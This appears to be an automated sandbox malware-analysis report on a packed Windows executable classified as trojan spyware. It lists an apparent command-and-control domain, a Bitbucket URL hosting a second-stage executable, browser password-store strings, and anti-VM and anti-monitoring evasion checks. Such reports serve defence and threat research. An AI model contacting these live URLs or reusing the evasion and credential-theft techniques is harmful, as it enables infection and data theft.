Source: tTGxYWtjG5.exe | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.pu
Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: tTGxYWtjG5.exe | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.
Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: tTGxYWtjG5.exeString found in binary or memory: https://bitbucket.org/
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe#CJ
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910462653.000000000073A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/zK
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1487811612.0000000000877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/(
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436694130.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/J
                Source: tTGxYWtjG5.exe, 00000001.00000003.1487811612.0000000000877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/Yec
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432666855.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406384434.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1436316095.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406504023.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432032954.00000000054A5000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406661276.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiER
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apij
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432666855.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432032954.00000000054A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apim
                Source: tTGxYWtjG5.exe, 00000001.00000003.1406384434.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406504023.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406661276.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiy
                Source: tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474101580.0000000000877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/s
                Source: tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/v
                Source: tTGxYWtjG5.exe, 00000001.00000003.1487811612.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apiocal
                Source: tTGxYWtjG5.exeString found in binary or memory: https://remote-app-switcher.prod-
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exeString found in binary or memory: https://remote-app-switcher.stg-east.frontend
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.15.177.52:443 -> 192.168.2.7:49758 version: TLS 1.2

                System Summary

                Source: tTGxYWtjG5.exe Static PE information: section name:
                Source: tTGxYWtjG5.exe Static PE information: section name: .rsrc
                Source: tTGxYWtjG5.exe Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840
                Source: tTGxYWtjG5.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: tTGxYWtjG5.exe Static PE information: Section: ZLIB complexity 0.9995404411764706
                Source: tTGxYWtjG5.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess424
                Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\fc99ead1-797b-4607-9934-8452d20ee8c0
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: tTGxYWtjG5.exe, 00000001.00000003.1360544691.00000000054BD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1384137725.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1359616936.00000000054DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: tTGxYWtjG5.exe ReversingLabs: Detection: 68%
                Source: tTGxYWtjG5.exe Virustotal: Detection: 51%
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe File read: C:\Users\user\Desktop\tTGxYWtjG5.exe
                Source: unknown Process created: C:\Users\user\Desktop\tTGxYWtjG5.exe "C:\Users\user\Desktop\tTGxYWtjG5.exe"
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Section loaded: version.dll
                Source: tTGxYWtjG5.exe Static file information: File size 2963968 > 1048576
                Source: tTGxYWtjG5.exe Static PE information: Raw size of zwpmlftu is bigger than: 0x100000 < 0x2a9e00

                Data Obfuscation

                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Unpacked PE file: 1.2.tTGxYWtjG5.exe.9c0000.0.unpack :EW;.rsrc :W;.idata :W;zwpmlftu:EW;dupzvwvc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;zwpmlftu:EW;dupzvwvc:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: tTGxYWtjG5.exe Static PE information: real checksum: 0x2da55a should be: 0x2e3124
                Source: tTGxYWtjG5.exe Static PE information: section name:
                Source: tTGxYWtjG5.exe Static PE information: section name: .rsrc
                Source: tTGxYWtjG5.exe Static PE information: section name: .idata
                Source: tTGxYWtjG5.exe Static PE information: section name: zwpmlftu
                Source: tTGxYWtjG5.exe Static PE information: section name: dupzvwvc
                Source: tTGxYWtjG5.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exe Code function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: tTGxYWtjG5.exe Static PE information: section name: entropy: 7.985601897033366

                Boot Survival

                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWindow searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSystem information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A1958B second address: A195AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A913FCE9Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A195AD second address: A195B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: A195B1 second address: A18DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 cld 0x00000009 push dword ptr [ebp+122D13FDh] 0x0000000f pushad 0x00000010 jmp 00007F2A913FCEA5h 0x00000015 mov dword ptr [ebp+122D3876h], edx 0x0000001b popad 0x0000001c call dword ptr [ebp+122D1C94h] 0x00000022 pushad 0x00000023 jmp 00007F2A913FCE9Fh 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1D15h], ebx 0x00000030 stc 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 mov dword ptr [ebp+122D1D15h], edi 0x0000003b mov dword ptr [ebp+122D3C85h], eax 0x00000041 jmp 00007F2A913FCE9Fh 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F2A913FCEA3h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 cmc 0x00000056 lodsw 0x00000058 clc 0x00000059 or dword ptr [ebp+122D1D15h], esi 0x0000005f add eax, dword ptr [esp+24h] 